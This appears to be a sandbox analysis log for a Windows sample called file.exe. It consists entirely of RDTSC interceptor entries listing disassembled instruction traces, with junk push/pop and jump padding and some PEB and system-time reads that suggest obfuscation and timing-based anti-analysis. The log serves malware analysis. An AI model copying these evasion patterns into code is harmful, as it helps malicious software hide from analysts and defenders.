Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7B6B0 second address: A7B6CF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F1A796B9BEFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F1A796B9BE6h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7B6CF second address: A7B6D9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1A796F3546h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7B6D9 second address: A7B6F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1A796B9BF1h 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7B835 second address: A7B85E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F1A796F354Dh 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F1A796F3554h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7B85E second address: A7B862 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7B862 second address: A7B868 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7F591 second address: A7F595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7F595 second address: A7F5B4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F1A796F3546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e jmp 00007F1A796F3551h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8ADF9 second address: A8ADFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8ADFF second address: A8AE1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1A796F354Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c jmp 00007F1A796F354Ah 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8AE1D second address: A8AE22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8AE22 second address: A8AE28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A99EDA second address: A99EDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A99EDE second address: A99EFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F1A796F354Ah 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jns 00007F1A796F3546h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9D156 second address: A9D15C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9D15C second address: A9D164 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9D164 second address: A9D171 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9D171 second address: A9D177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9D177 second address: A9D182 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA4795 second address: AA47B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F1A796F354Bh 0x0000000b jmp 00007F1A796F354Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA47B3 second address: AA47DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F1A796B9BF1h 0x00000012 popad 0x00000013 pushad 0x00000014 jl 00007F1A796B9BE6h 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d pop eax 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA494D second address: AA4953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA4953 second address: AA496C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1A796B9BF4h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA496C second address: AA4982 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1A796F3558h 0x00000008 jmp 00007F1A796F354Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA4AAD second address: AA4AB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA4AB1 second address: AA4ABD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F1A796F3546h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA4ABD second address: AA4AF9 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1A796B9BFEh 0x00000008 push ecx 0x00000009 jmp 00007F1A796B9BF1h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pop ecx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA4C3C second address: AA4C55 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1A796F3546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jmp 00007F1A796F354Ah 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA5079 second address: AA508A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jo 00007F1A796B9BE6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA5220 second address: AA5225 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA5225 second address: AA522F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA537B second address: AA5381 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAA047 second address: AAA088 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1A796B9BFFh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jl 00007F1A796B9C03h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F1A796B9BF5h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA07C6 second address: 4DA07CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA07CA second address: 4DA07D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA07D0 second address: 4DA085E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, eax 0x00000005 call 00007F1A796F3558h 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F1A796F354Eh 0x00000016 sbb ax, 2998h 0x0000001b jmp 00007F1A796F354Bh 0x00000020 popfd 0x00000021 jmp 00007F1A796F3558h 0x00000026 popad 0x00000027 xchg eax, ecx 0x00000028 pushad 0x00000029 mov cx, 590Dh 0x0000002d pushfd 0x0000002e jmp 00007F1A796F354Ah 0x00000033 add ax, AB28h 0x00000038 jmp 00007F1A796F354Bh 0x0000003d popfd 0x0000003e popad 0x0000003f call dword ptr [74E5188Ch] 0x00000045 mov edi, edi 0x00000047 push ebp 0x00000048 mov ebp, esp 0x0000004a push ecx 0x0000004b mov ecx, dword ptr [7FFE0004h] 0x00000051 mov dword ptr [ebp-04h], ecx 0x00000054 cmp ecx, 01000000h 0x0000005a jc 00007F1A79725025h 0x00000060 mov eax, 7FFE0320h 0x00000065 mov eax, dword ptr [eax] 0x00000067 mul ecx 0x00000069 shrd eax, edx, 00000018h 0x0000006d mov esp, ebp 0x0000006f pop ebp 0x00000070 ret 0x00000071 pushad 0x00000072 mov si, B73Bh 0x00000076 push eax 0x00000077 push edx 0x00000078 mov al, 61h 0x0000007a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA085E second address: 4DA0862 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0862 second address: 4DA087E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F1A796F3552h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA087E second address: 4DA0791 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 1E71A864h 0x00000008 mov dl, E6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d ret 0x0000000e nop 0x0000000f xor esi, eax 0x00000011 lea eax, dword ptr [ebp-10h] 0x00000014 push eax 0x00000015 call 00007F1A7E0573D6h 0x0000001a mov edi, edi 0x0000001c pushad 0x0000001d push ecx 0x0000001e pushfd 0x0000001f jmp 00007F1A796B9BEBh 0x00000024 sub ah, FFFFFFAEh 0x00000027 jmp 00007F1A796B9BF9h 0x0000002c popfd 0x0000002d pop eax 0x0000002e mov ax, bx 0x00000031 popad 0x00000032 push esi 0x00000033 jmp 00007F1A796B9BF8h 0x00000038 mov dword ptr [esp], ebp 0x0000003b pushad 0x0000003c call 00007F1A796B9BEEh 0x00000041 pushfd 0x00000042 jmp 00007F1A796B9BF2h 0x00000047 and cx, A5B8h 0x0000004c jmp 00007F1A796B9BEBh 0x00000051 popfd 0x00000052 pop eax 0x00000053 push edx 0x00000054 mov edx, eax 0x00000056 pop ecx 0x00000057 popad 0x00000058 mov ebp, esp 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d pushfd 0x0000005e jmp 00007F1A796B9BF8h 0x00000063 jmp 00007F1A796B9BF5h 0x00000068 popfd 0x00000069 mov ecx, 6B856EB7h 0x0000006e popad 0x0000006f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0791 second address: 4DA0797 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80009 second address: 4D80064 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1A796B9BF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F1A796B9BEEh 0x00000011 jmp 00007F1A796B9BF5h 0x00000016 popfd 0x00000017 mov edx, ecx 0x00000019 popad 0x0000001a push eax 0x0000001b pushad 0x0000001c mov ecx, edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F1A796B9BF5h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80064 second address: 4D80113 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F1A796F3550h 0x00000008 jmp 00007F1A796F3555h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 jmp 00007F1A796F354Eh 0x00000017 mov ebp, esp 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F1A796F354Eh 0x00000020 xor si, 7898h 0x00000025 jmp 00007F1A796F354Bh 0x0000002a popfd 0x0000002b pushfd 0x0000002c jmp 00007F1A796F3558h 0x00000031 xor eax, 60FE22F8h 0x00000037 jmp 00007F1A796F354Bh 0x0000003c popfd 0x0000003d popad 0x0000003e mov eax, dword ptr fs:[00000030h] 0x00000044 jmp 00007F1A796F3556h 0x00000049 sub esp, 18h 0x0000004c pushad 0x0000004d push eax 0x0000004e push edx 0x0000004f movzx eax, dx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80113 second address: 4D80117 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80269 second address: 4D80281 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1A796F3554h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80281 second address: 4D80285 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80285 second address: 4D802B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F1A796F3559h 0x00000012 jmp 00007F1A796F354Bh 0x00000017 popfd 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D802B9 second address: 4D802BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D802BE second address: 4D802C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D802C4 second address: 4D802F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], edi 0x0000000b pushad 0x0000000c pushad 0x0000000d mov dh, 7Ah 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 pop eax 0x00000014 popad 0x00000015 call dword ptr [74E50B60h] 0x0000001b mov eax, 750BE5E0h 0x00000020 ret 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F1A796B9BF4h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D802F5 second address: 4D80320 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000044h 0x0000000a pushad 0x0000000b movsx edi, ax 0x0000000e push esi 0x0000000f push ebx 0x00000010 pop eax 0x00000011 pop edi 0x00000012 popad 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F1A796F3555h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80320 second address: 4D80330 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1A796B9BECh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80330 second address: 4D80334 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80334 second address: 4D80352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F1A796B9BECh 0x0000000e mov dword ptr [esp], edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80352 second address: 4D80356 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80356 second address: 4D8035C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80424 second address: 4D80428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80428 second address: 4D8042C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8042C second address: 4D80432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80432 second address: 4D8044B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1A796B9BF5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8044B second address: 4D8044F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8044F second address: 4D80473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1A796B9BF8h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80473 second address: 4D804D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1A796F354Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b jmp 00007F1A796F3556h 0x00000010 je 00007F1AE9772754h 0x00000016 jmp 00007F1A796F3550h 0x0000001b sub eax, eax 0x0000001d jmp 00007F1A796F3551h 0x00000022 mov dword ptr [esi], edi 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F1A796F354Dh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D804D4 second address: 4D80594 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1A796B9BF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+04h], eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F1A796B9BECh 0x00000013 sbb esi, 128CFB18h 0x00000019 jmp 00007F1A796B9BEBh 0x0000001e popfd 0x0000001f movzx esi, di 0x00000022 popad 0x00000023 mov dword ptr [esi+08h], eax 0x00000026 jmp 00007F1A796B9BEBh 0x0000002b mov dword ptr [esi+0Ch], eax 0x0000002e jmp 00007F1A796B9BF6h 0x00000033 mov eax, dword ptr [ebx+4Ch] 0x00000036 jmp 00007F1A796B9BF0h 0x0000003b mov dword ptr [esi+10h], eax 0x0000003e jmp 00007F1A796B9BF0h 0x00000043 mov eax, dword ptr [ebx+50h] 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 movsx edx, ax 0x0000004c pushfd 0x0000004d jmp 00007F1A796B9BF6h 0x00000052 jmp 00007F1A796B9BF5h 0x00000057 popfd 0x00000058 popad 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80594 second address: 4D805A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1A796F354Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D805A4 second address: 4D805A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D806B1 second address: 4D806B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D806B7 second address: 4D8070D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1A796B9BF2h 0x00000008 pushfd 0x00000009 jmp 00007F1A796B9BF2h 0x0000000e sub si, D6C8h 0x00000013 jmp 00007F1A796B9BEBh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov dword ptr [esi+24h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F1A796B9BF5h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8070D second address: 4D80799 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 push edx 0x00000007 pop ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+64h] 0x0000000e pushad 0x0000000f mov ax, bx 0x00000012 push edx 0x00000013 jmp 00007F1A796F354Ah 0x00000018 pop esi 0x00000019 popad 0x0000001a mov dword ptr [esi+28h], eax 0x0000001d jmp 00007F1A796F3551h 0x00000022 mov eax, dword ptr [ebx+68h] 0x00000025 jmp 00007F1A796F354Eh 0x0000002a mov dword ptr [esi+2Ch], eax 0x0000002d pushad 0x0000002e mov cl, 07h 0x00000030 pushfd 0x00000031 jmp 00007F1A796F3553h 0x00000036 sub ax, FD2Eh 0x0000003b jmp 00007F1A796F3559h 0x00000040 popfd 0x00000041 popad 0x00000042 mov ax, word ptr [ebx+6Ch] 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 mov ecx, ebx 0x0000004b mov di, E19Ah 0x0000004f popad 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80799 second address: 4D807F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, bx 0x00000006 mov edi, 4B38D33Eh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov word ptr [esi+30h], ax 0x00000012 jmp 00007F1A796B9BF5h 0x00000017 mov ax, word ptr [ebx+00000088h] 0x0000001e jmp 00007F1A796B9BEEh 0x00000023 mov word ptr [esi+32h], ax 0x00000027 jmp 00007F1A796B9BF0h 0x0000002c mov eax, dword ptr [ebx+0000008Ch] 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D807F5 second address: 4D807F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D807F9 second address: 4D807FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D807FF second address: 4D80881 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1A796F3554h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+34h], eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F1A796F354Eh 0x00000013 add esi, 057694F8h 0x00000019 jmp 00007F1A796F354Bh 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007F1A796F3558h 0x00000025 sbb cx, EF58h 0x0000002a jmp 00007F1A796F354Bh 0x0000002f popfd 0x00000030 popad 0x00000031 mov eax, dword ptr [ebx+18h] 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F1A796F3555h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80881 second address: 4D80887 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D809CD second address: 4D80A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushfd 0x00000006 jmp 00007F1A796F3551h 0x0000000b add ax, AF56h 0x00000010 jmp 00007F1A796F3551h 0x00000015 popfd 0x00000016 popad 0x00000017 nop 0x00000018 jmp 00007F1A796F354Eh 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F1A796F354Eh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80A1C second address: 4D80A22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80A22 second address: 4D80A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
